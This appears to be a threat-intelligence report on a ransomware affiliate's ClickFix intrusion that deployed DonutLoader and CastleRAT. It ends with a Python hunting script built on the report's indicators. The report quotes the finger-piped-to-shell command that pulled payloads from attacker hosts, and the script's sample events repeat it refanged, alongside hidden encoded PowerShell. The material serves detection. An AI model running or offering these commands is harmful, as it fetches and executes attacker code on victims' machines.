Velvet Tempest Deploys CastleRAT via ClickFix Attacks
Ransomware affiliate Velvet Tempest uses ClickFix social engineering to deploy DonutLoader and CastleRAT in 12-day intrusion linked to Termite ransomware staging.
Threat researchers at MalBeacon observed ransomware affiliate Velvet Tempest conducting a 12-day intrusion using ClickFix social engineering to deploy DonutLoader and CastleRAT malware. The operation, which ran from February 3-16 in a U.S. nonprofit environment, shares infrastructure with Termite ransomware staging systems.
Velvet Tempest (also tracked as DEV-0504) has operated as a ransomware affiliate for at least five years, deploying strains including Ryuk, REvil, Conti, BlackMatter, BlackCat/ALPHV, LockBit, and RansomHub. The group's adoption of ClickFix marks the first public reporting tying these specific attack chains to Velvet Tempest operations.
The Attack Unfolds
The intrusion began when a victim encountered a malicious advertisement displaying a fake "verify you are human" prompt. Unlike traditional malware delivery through email attachments or macros, ClickFix tricks users into copying a command and pasting it into the Windows Run dialog themselves.
The pasted command initiated a chain of nested cmd.exe processes and abused the legitimate Windows utility finger.exe to fetch initial payloads. From there, the attack progressed through distinct phases:
Stage 1-2: Initial Access
The ClickFix command executed: finger clo@finger[.]h3securecloud[.]com | %COMSPEC%
This retrieved and executed additional PowerShell payloads using Invoke-Expression (IEX) downloads from attacker infrastructure including vrstudio[.]life and gamestudio[.]life.
Stage 3: DonutLoader Deployment
DonutLoader staging established persistent command-and-control communications. The loader compiled .NET components dynamically using csc.exe from user temporary directories—a technique designed to evade static detection.
Stage 4: CastleRAT and Reconnaissance
CastleRAT callbacks connected to nachalonachalo[.]com and akamedmain[.]com. The operator then executed hands-on-keyboard activity: Active Directory enumeration via nltest and net commands, domain trust discovery, and drive mapping reconnaissance.
Three days into the intrusion, attackers attempted Chrome credential extraction using a script hosted at 143.198.160[.]37—an IP address associated with Termite ransomware infrastructure.
Technical Indicators
Security teams should hunt for these behaviors:
PowerShell Patterns:
- -WindowStyle Hidden combined with -EncodedCommand flags
- IEX (Invoke-Expression) with DownloadData against .life TLDs
File System Activity:
- .NET compilation via csc.exe from %TEMP% directories
- Python components under C:\ProgramData\AndronFolder
Network Indicators:
- Domains: h3securecloud[.]com, grtrip[.]org, vrstudio[.]life, gamestudio[.]life
- C2 IPs: 143.198.160[.]37, 134.209.125[.]225, 24.199.81[.]95, 170.130.55[.]86
ClickFix Evolution
ClickFix has emerged as a dominant social engineering technique in 2026, displacing older methods like SocGholish. We've tracked multiple campaigns abusing this approach, including ClickFix attacks using fake CAPTCHA lures to deploy Amatera Stealer and the EVALUSION campaign targeting enterprise environments.
The technique works because it bypasses security controls that focus on attachments, macros, and downloaded executables. When users manually paste commands into the Run dialog, they're effectively authorizing the execution themselves—circumventing application whitelisting and behavioral analysis at the point of initial compromise.
Why This Matters
No encryption occurred during the monitored 12-day window, but the infrastructure links to Termite ransomware suggest pre-positioning for later extortion. This aligns with modern ransomware operations that prioritize reconnaissance and credential harvesting before pulling the trigger on encryption.
The dwell time also enables broader access. Velvet Tempest's AD enumeration indicates interest in understanding the full environment—identifying domain trusts, privileged accounts, and lateral movement opportunities that would maximize a future ransomware deployment's impact.
Organizations in the nonprofit sector, which historically lack dedicated security resources, represent attractive targets. The BridgePay ransomware incident demonstrated how ransomware operators increasingly target organizations supporting critical functions rather than the highest-profile names.
Defensive Recommendations
- Educate users about ClickFix lures—legitimate CAPTCHA services never ask users to paste commands
- Restrict PowerShell to signed scripts or constrained language mode where feasible
- Monitor for csc.exe compilation outside development contexts
- Block known C2 domains at the network perimeter
- Alert on finger.exe usage, which has minimal legitimate purpose in most environments
The 12-day persistence before detection in this case underscores the importance of continuous monitoring. Behavioral detection focused on the execution chain—cmd.exe spawning PowerShell with encoded commands connecting to .life domains—provides defense-in-depth against this evolving threat.
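The hunt indicators and the detection-focused recommendations above, turned into detection logic that runs over process-creation telemetry. This is an added example, not code from MalBeacon or the original report; the event schema (parent, image, cmdline), the rule names and the sample events are constructed, while the domain, IP and path values are the ones listed in this article.

```python
import re

# Indicators listed in the report above (kept defanged as printed there).
C2_DOMAINS = {"h3securecloud[.]com", "grtrip[.]org", "vrstudio[.]life",
              "gamestudio[.]life", "nachalonachalo[.]com", "akamedmain[.]com"}
C2_IPS = {"143.198.160[.]37", "134.209.125[.]225", "24.199.81[.]95",
          "170.130.55[.]86"}
REFANGED = {ioc.replace("[.]", ".") for ioc in C2_DOMAINS | C2_IPS}

def hunt(event):
    """Return the hunt rules matched by one process-creation event
    (constructed schema: dict with 'parent', 'image', 'cmdline')."""
    image, parent = event["image"].lower(), event["parent"].lower()
    low = event["cmdline"].lower()
    hits = []
    # finger.exe has little legitimate use; stage 1 piped it into %COMSPEC%.
    if image.endswith("finger.exe") or re.search(r"\bfinger(\.exe)?\s", low):
        hits.append("finger_lolbin")
    # cmd.exe spawning hidden PowerShell with an encoded command (-e/-ec/-enc/-EncodedCommand).
    if (image.endswith("powershell.exe") and parent.endswith("cmd.exe")
            and "-windowstyle hidden" in low
            and re.search(r"\s-e(c|nc|ncodedcommand)?\s", low)):
        hits.append("hidden_encoded_powershell")
    # Invoke-Expression over DownloadData output fetched from a .life host.
    if (re.search(r"\b(iex|invoke-expression)\b", low) and "downloaddata" in low
            and re.search(r"https?://[\w.-]+\.life\b", low)):
        hits.append("iex_downloaddata_life_tld")
    # Ad-hoc .NET compilation out of a user temp directory.
    if image.endswith("csc.exe") and re.search(r"\\appdata\\local\\temp\\|%temp%", low):
        hits.append("csc_from_temp")
    # Python components staged under the folder named in the report.
    if r"c:\programdata\andronfolder" in low:
        hits.append("andronfolder_python")
    # Any reference to the report's C2 domains or IPs.
    if any(ioc in low for ioc in REFANGED):
        hits.append("known_c2_indicator")
    return hits

# Constructed sample telemetry modelled on the stages described above.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c finger clo@finger.h3securecloud.com | %COMSPEC%"},
    {"parent": "cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -WindowStyle Hidden -enc SQBFAFgA"},
    {"parent": "powershell.exe", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r"csc.exe /out:C:\Users\u\AppData\Local\Temp\a.dll C:\Users\u\AppData\Local\Temp\a.cs"},
]

def scan(events):
    # Map each event index to its matched rules, dropping clean events.
    return {i: hits for i, e in enumerate(events) if (hits := hunt(e))}
```

Feeding real EDR or Sysmon event 1 records through hunt() only requires mapping their parent image, image and command-line fields onto the three keys.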